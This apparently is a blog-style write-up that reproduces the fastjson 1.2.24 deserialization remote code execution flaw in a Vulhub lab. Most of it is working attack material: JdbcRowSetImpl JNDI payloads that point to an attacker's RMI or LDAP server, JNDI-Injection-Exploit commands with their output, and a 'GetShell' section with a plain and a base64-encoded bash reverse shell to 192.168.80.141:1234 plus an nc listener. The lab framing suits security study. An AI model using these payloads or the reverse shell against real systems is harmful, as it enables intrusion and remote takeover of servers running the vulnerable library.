Thanks to the Internet for sharing knowledge and wisdom. In a society ruled by law, please abide by relevant laws and regulations
Article directory
-
-
- 1.1. Vulnerability description
- 1.2. Vulnerability level
- 1.3. Affected versions
- 1.4. Vulnerability recurrence
-
- 1. Basic environment
- 2. Vulnerability detection
- 3. Vulnerability verification
- 1.5. In-depth utilization
-
- 1.GetShell
-
| Description | Content |
|---|---|
| Vulnerability number | |
| Vulnerability name | fastjson 1.2.24 deserialization leads to arbitrary command execution vulnerability |
| Vulnerability rating | |
| Scope of impact | |
| Vulnerability description | |
| Repair plan |
1.1. Vulnerability description
FastJson is an open source Json parsing library from Alibaba that can be used to convert Java objects into their Json representation, and can also be used to convert Json strings into equivalent Java objects. FastJson vulnerabilities have emerged one after another in recent years. The source of the RCE vulnerability: the 1.2.24 deserialization vulnerability discovered in FastJson in 2017.
Regarding the FastJson1.2.24 deserialization vulnerability, in simple terms, it is caused by the lack of reasonable checks when FastJson deserializes the incoming string into a Java object through parseObject/parse.
1.2, vulnerability level
high risk
1.3, affected version
1.2.24
1.4. Vulnerability recurrence
1. Basic environment
Path: Vulhub/fastjson/1.2.24-rce
Start the test environment:
sudo docker-compose up -d
Visit http://your-ip:8090/ to see
Send test data:
{<!-- -->"name":"hello", "age":20}
2. Vulnerability detection
Use BurpSuite extension plug-in FastjsonScan for vulnerability detection
POC:
{<!-- -->
"handsome":{<!-- -->
"@type":"Lcom.sun.rowset.JdbcRowSetImpl;",
"dataSourceName":
"rmi://wvvlunpw9mk6u4suzoi884ibw22sqh.oastify.com/aaa",
"autoCommit":true
}
}
Test using dnslog
3. Vulnerability verification
Use the JNDI-Injection-Exploit tool to open the RMI server
Create the hello file in the /tmp directory
┌──(kali?kali)-[~/tools/JNDI-Injection-Exploit] └─$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch /tmp/hello" -A "192.168.80.141" Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true [ADDRESS] >> 192.168.80.141 [COMMAND] >> touch /tmp/hello ----------------------------JNDI Links-------------------------- -------- Target environment(Build in JDK 1.7 whose trustURLCodebase is true): rmi://192.168.80.141:1099/52e3fa ldap://192.168.80.141:1389/52e3fa Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8 + or SpringBoot 1.2.x + in classpath): rmi://192.168.80.141:1099/atawc5 Target environment(Build in JDK 1.8 whose trustURLCodebase is true): rmi://192.168.80.141:1099/gfk0fp ldap://192.168.80.141:1389/gfk0fp ----------------------------Server Log-------------------- -------- 2023-09-08 01:38:44 [JETTYSERVER]>> Listening on 0.0.0.0:8180 2023-09-08 01:38:44 [RMISERVER] >> Listening on 0.0.0.0:1099 2023-09-08 01:38:44 [LDAPSERVER] >> Listening on 0.0.0.0:1389
Send POC to FastJson server and remotely load malicious classes through RMI protocol
{<!-- -->
"handsome":{<!-- -->
"@type":"Lcom.sun.rowset.JdbcRowSetImpl;",
"dataSourceName": "rmi://192.168.80.141:1099/atawc5",
"autoCommit":true
}
}
verify:
1.5, in-depth utilization
1. GetShell
Construct a rebound shell command:
bash -i > & amp; /dev/tcp/192.168.80.141/1234 0> & amp;1
bash -c {<!-- -->echo,YmFzaCAtaSA + JiAvZGV2L3RjcC8xOTIuMTY4LjgwLjE0MS8xMjM0IDA + JjE=}|{<!-- -->base64,-d}|{<!-- -->bash,-i}
Listen to 1234 port
nc -lvp 1234
Enable RMI service
┌──(kali?kali)-[~/tools/JNDI-Injection-Exploit]
└─$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA + JiAvZGV2L3RjcC8xOTIuMTY4LjgwLjE0MS8xMjM0IDA + JjE=}|{base64,-d}|{bash,-i}" -A "192.168.80.141"
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[ADDRESS] >> 192.168.80.141
[COMMAND] >> bash -c {<!-- -->echo,YmFzaCAtaSA + JiAvZGV2L3RjcC8xOTIuMTY4LjgwLjE0MS8xMjM0IDA + JjE=}|{<!-- -->base64,-d}|{<!-- -->bash, -i}
----------------------------JNDI Links-------------------------- --------
Target environment(Build in JDK 1.8 whose trustURLCodebase is true):
rmi://192.168.80.141:1099/qkgjya
ldap://192.168.80.141:1389/qkgjya
Target environment(Build in JDK 1.7 whose trustURLCodebase is true):
rmi://192.168.80.141:1099/n9qirm
ldap://192.168.80.141:1389/n9qirm
Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8 + or SpringBoot 1.2.x + in classpath):
rmi://192.168.80.141:1099/nmyogr
----------------------------Server Log-------------------- --------
2023-09-08 01:53:48 [JETTYSERVER]>> Listening on 0.0.0.0:8180
2023-09-08 01:53:48 [RMISERVER] >> Listening on 0.0.0.0:1099
2023-09-08 01:53:48 [LDAPSERVER] >> Listening on 0.0.0.0:1389
POC:
{<!-- -->
"handsome":{<!-- -->
"@type":"Lcom.sun.rowset.JdbcRowSetImpl;",
"dataSourceName": "ldap://192.168.80.141:1389/qkgjya",
"autoCommit":true
}
}
Get Shell
